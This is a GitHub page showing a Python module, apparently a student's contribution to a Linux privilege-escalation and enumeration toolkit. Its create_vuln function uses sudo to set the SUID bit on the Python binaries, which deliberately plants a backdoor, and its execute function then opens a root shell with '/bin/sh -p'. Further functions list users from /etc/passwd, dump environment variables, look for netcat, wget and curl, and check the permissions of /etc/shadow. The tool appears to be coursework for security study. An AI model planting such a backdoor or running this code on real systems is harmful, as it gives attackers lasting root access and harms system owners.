Permalink
Cannot retrieve contributors at this time
Name already in use
A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
submodule/plugins_C.py
Go to fileThis commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
219 lines (197 sloc)
10.6 KB
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import subprocess | |
import os | |
import sys | |
def Output_File(directory, file_name, content): | |
""" | |
Function used to save the output from the commands to a file | |
args: | |
directory: stores a directory path | |
file_name: stores a file name | |
content: stores the command line commands | |
""" | |
with open(directory+"/"+file_name, "a+") as output: | |
output.write(content) | |
class Privesc_C1: | |
def create_vuln(): | |
""" | |
Function used to create the Python Vulnerability that grants us access to an higher privilege shell | |
""" | |
os.system("sudo sh -c 'cp $(which python) .; chmod +s /bin/python*'") | |
def execute(): | |
""" | |
Function used to exploit the Python vulnerability to create a higher privilege shell | |
""" | |
print("\033c") | |
print("\033[1;36;40mPython PrivEsc, by Student C. Creates a Shell with root permissions through Python Exploit with SUID bit\033[0m") | |
print() | |
os.execl("/bin/sh", "sh", "-p") | |
class Enumeration_C1: | |
def system_info(): | |
""" | |
Function used to display System information and to save it to a log file if the user wants | |
vars: | |
content: used to save the commands that were run if the user wants to save the output of them | |
answer: used to save the input of the user | |
directory: stores the directory to store the log file | |
file_name: stores the file name of the log file | |
""" | |
content = [] | |
print("\033c") | |
print("\033[1;31;40m--------------------\033[0m\033[1;37;40mSYSTEM INFORMATION\033[0m\033[1;31;40m--------------------\033[0m") | |
print() | |
print("\033[1;31;40m-----\033[0m\033[1;37;40mKernel Information:\033[0m\033[1;31;40m-----\033[0m") | |
print() | |
sp=subprocess.run('uname -a', shell=True) | |
print() | |
print("\033[1;31;40m-----\033[0m\033[1;37;40mVersion Information:\033[0m\033[1;31;40m-----\033[0m") | |
print() | |
sp=subprocess.run('cat /etc/*-release', shell=True) | |
print() | |
print("\033[1;31;40m-----\033[0m\033[1;37;40mList of all users:\033[0m\033[1;31;40m-----\033[0m") | |
print() | |
sp=subprocess.run("cut -d':' -f1 /etc/passwd", shell=True) | |
print() | |
print("\033[1;36;40mSystem Information, by Student C. Displays some system information\033[0m") | |
print() | |
print("\033[1;35;40mDo you want to save the output to a file? ('YES' or 'NO')\033[0m") | |
answer=input() | |
if answer=="YES": | |
print() | |
print("\033[1;33;40mChoose the directory where you want to save the log (If you want to save on '/' dont write anything here)\033[0m") | |
print() | |
directory=input() | |
print() | |
print("\033[1;33;40mChoose the filename for the log\033[0m") | |
print() | |
file_name=input() | |
file_name ="/"+file_name+".txt" | |
content.append("-----Kernel Information:-----") | |
content.append(subprocess.getoutput("uname -a")) | |
content.append("-----Version Information:-----") | |
content.append(subprocess.getoutput("cat /etc/*-release")) | |
content.append("-----Content of /etc/passwd:-----") | |
content.append(subprocess.getoutput("cat /etc/passwd")) | |
for i in content: | |
Output_File(directory, file_name, i + "\n") | |
else: | |
pass | |
class Enumeration_C2: | |
def env_info(): | |
""" | |
Function used to display Environment information and to save it to a log file if the user wants | |
vars: | |
content: used to save the commands that were run if the user wants to save the output of them | |
answer: used to save the input of the user | |
directory: stores the directory to store the log file | |
file_name: stores the file name of the log file | |
""" | |
content = [] | |
print("\033c") | |
print("\033[1;31;40m--------------------\033[0m\033[1;37;40mENVIRONMENT INFORMATION\033[0m\033[1;31;40m--------------------\033[0m") | |
print() | |
print("\033[1;31;40m-----\033[0m\033[1;37;40mEnvironment Information:\033[0m\033[1;31;40m-----\033[0m") | |
print() | |
sp=subprocess.run("env", shell=True) | |
print() | |
print("\033[1;31;40m-----\033[0m\033[1;37;40mAvailable Shells:\033[0m\033[1;31;40m-----\033[0m") | |
print() | |
sp=subprocess.run("cat /etc/shells", shell=True) | |
print() | |
print("\033[1;31;40m-----\033[0m\033[1;37;40mCurrent umask value:\033[0m\033[1;31;40m-----\033[0m") | |
print() | |
sp=subprocess.run("umask -S; umask", shell=True) | |
print() | |
print("\033[1;31;40m-----\033[0m\033[1;37;40mUmask value in /etc/login.defs:\033[0m\033[1;31;40m-----\033[0m") | |
print() | |
sp=subprocess.run("grep -i '^UMASK' /etc/login.defs", shell=True) | |
print() | |
print("\033[1;31;40m-----\033[0m\033[1;37;40mPassword and password storage information:\033[0m\033[1;31;40m-----\033[0m") | |
print() | |
sp=subprocess.run("grep '^PASS_MAX_DAYS\|^PASS_MIN_DAYS\|^PASS_WARN_AGE\|^ENCRYPT_METHOD' /etc/login.defs", shell=True) | |
print() | |
print("\033[1;36;40mEnvironment Information, by Student C. Displays some useful environmental information like available shells\033[0m") | |
print() | |
print("\033[1;35;40mDo you want to save the output to a file? ('YES' or 'NO')\033[0m") | |
answer=input() | |
if answer=="YES": | |
print() | |
print("\033[1;33;40mChoose the directory where you want to save the log (If you want to save on '/' dont write anything here)\033[0m") | |
print() | |
directory=input() | |
print() | |
print("\033[1;33;40mChoose the filename for the log\033[0m") | |
print() | |
file_name=input() | |
file_name ="/"+file_name+".txt" | |
content.append("\033[1;31;40m-----\033[0m\033[1;37;40mEnvironment Information:\033[0m\033[1;31;40m-----\033[0m") | |
content.append(subprocess.getoutput("env")) | |
content.append("\033[1;31;40m-----\033[0m\033[1;37;40mAvailable Shells:\033[0m\033[1;31;40m-----\033[0m") | |
content.append(subprocess.getoutput("cat /etc/shells")) | |
content.append("\033[1;31;40m-----\033[0m\033[1;37;40mCurrent umask value:\033[0m\033[1;31;40m-----\033[0m") | |
content.append(subprocess.getoutput("umask -S; umask")) | |
content.append("\033[1;31;40m-----\033[0m\033[1;37;40mUmask value in /etc/login.defs:\033[0m\033[1;31;40m-----\033[0m") | |
content.append(subprocess.getoutput("grep -i '^UMASK' /etc/login.defs")) | |
content.append("\033[1;31;40m-----\033[0m\033[1;37;40mPassword and password storage information:\033[0m\033[1;31;40m-----\033[0m") | |
content.append(subprocess.getoutput("grep '^PASS_MAX_DAYS\|^PASS_MIN_DAYS\|^PASS_WARN_AGE\|^ENCRYPT_METHOD' /etc/login.defs")) | |
for i in content: | |
Output_File(directory, file_name, i + "\n") | |
else: | |
pass | |
class Enumeration_C3: | |
def interesting_files(): | |
""" | |
Function used to display Information about some specific files that can be useful for the user and to save it to a log file if the user wants | |
vars: | |
content: used to save the commands that were run if the user wants to save the output of them | |
answer: used to save the input of the user | |
directory: stores the directory to store the log file | |
file_name: stores the file name of the log file | |
""" | |
content = [] | |
print("\033c") | |
print("\033[1;31;40m--------------------\033[0m\033[1;37;40mINTERESTING FILES\033[0m\033[1;31;40m--------------------\033[0m") | |
print() | |
print("\033[1;31;40m-----\033[0m\033[1;37;40mUseful files locations:\033[0m\033[1;31;40m-----\033[0m") | |
print() | |
sp=subprocess.run("which nc; which netcat; which wget; which nmap ; which gcc; which curl",shell=True) | |
print() | |
print("\033[1;31;40m-----\033[0m\033[1;37;40mInstalled compilers:\033[0m\033[1;31;40m-----\033[0m") | |
print() | |
sp=subprocess.run("dpkg --list | grep compiler |grep -v decompiler && yum list installed 'gcc*' | grep gcc",shell=True) | |
print() | |
print("\033[1;31;40m----\033[0m\033[1;37;40m-Permissions of sensitive files:\033[0m\033[1;31;40m-----\033[0m") | |
print() | |
sp=subprocess.run("ls -la /etc/passwd ; ls -la /etc/group ; ls -la /etc/profile ; ls -la /etc/shadow ;", shell=True) | |
print() | |
sp=subprocess.getoutput("find / -perm -1000 > tmp") | |
print("\033[1;31;40m-----\033[0m\033[1;37;40mFiles with Sticky Bits:\033[0m\033[1;31;40m-----\033[0m") | |
print() | |
sp=subprocess.run("cat tmp",shell=True) | |
print() | |
print("\033[1;36;40mInteresting Files, by Student C. Displays information about some sensitive files and shows out the location of important files\033[0m") | |
print() | |
print("\033[1;35;40mDo you want to save the output to a file? ('YES' or 'NO')\033[0m") | |
answer=input() | |
if answer=="YES": | |
print() | |
print("\033[1;33;40mChoose the directory where you want to save the log (If you want to save on '/' dont write anything here)\033[0m") | |
print() | |
directory=input() | |
print() | |
print("\033[1;33;40mChoose the filename for the log\033[0m") | |
print() | |
file_name=input() | |
file_name ="/"+file_name+".txt" | |
content.append("\033[1;31;40m-----\033[0m\033[1;37;40mUseful Files locations:\033[0m\033[1;31;40m-----\033[0m") | |
content.append(subprocess.getoutput("which nc; which netcat; which wget; which nmap ; which gcc; which curl")) | |
content.append("\033[1;31;40m-----\033[0m\033[1;37;40mInstalled Compilers:\033[0m\033[1;31;40m-----\033[0m") | |
content.append(subprocess.getoutput("dpkg --list | grep compiler |grep -v decompiler && yum list installed 'gcc*' | grep gcc")) | |
content.append("\033[1;31;40m-----\033[0m\033[1;37;40mPermissions of sensitive files:\033[0m\033[1;31;40m-----\033[0m") | |
content.append(subprocess.getoutput("ls -la /etc/passwd ; ls -la /etc/group ; ls -la /etc/profile ; ls -la /etc/shadow ;")) | |
content.append("\033[1;31;40m-----\033[0m\033[1;37;40mFiles with Sticky Bits:\033[0m\033[1;31;40m-----\033[0m") | |
content.append(subprocess.getoutput("cat tmp")) | |
sp=subprocess.run("rm tmp",shell=True) | |
for i in content: | |
Output_File(directory, file_name, i + "\n") | |
else: | |
sp=subprocess.run("rm tmp",shell=True) |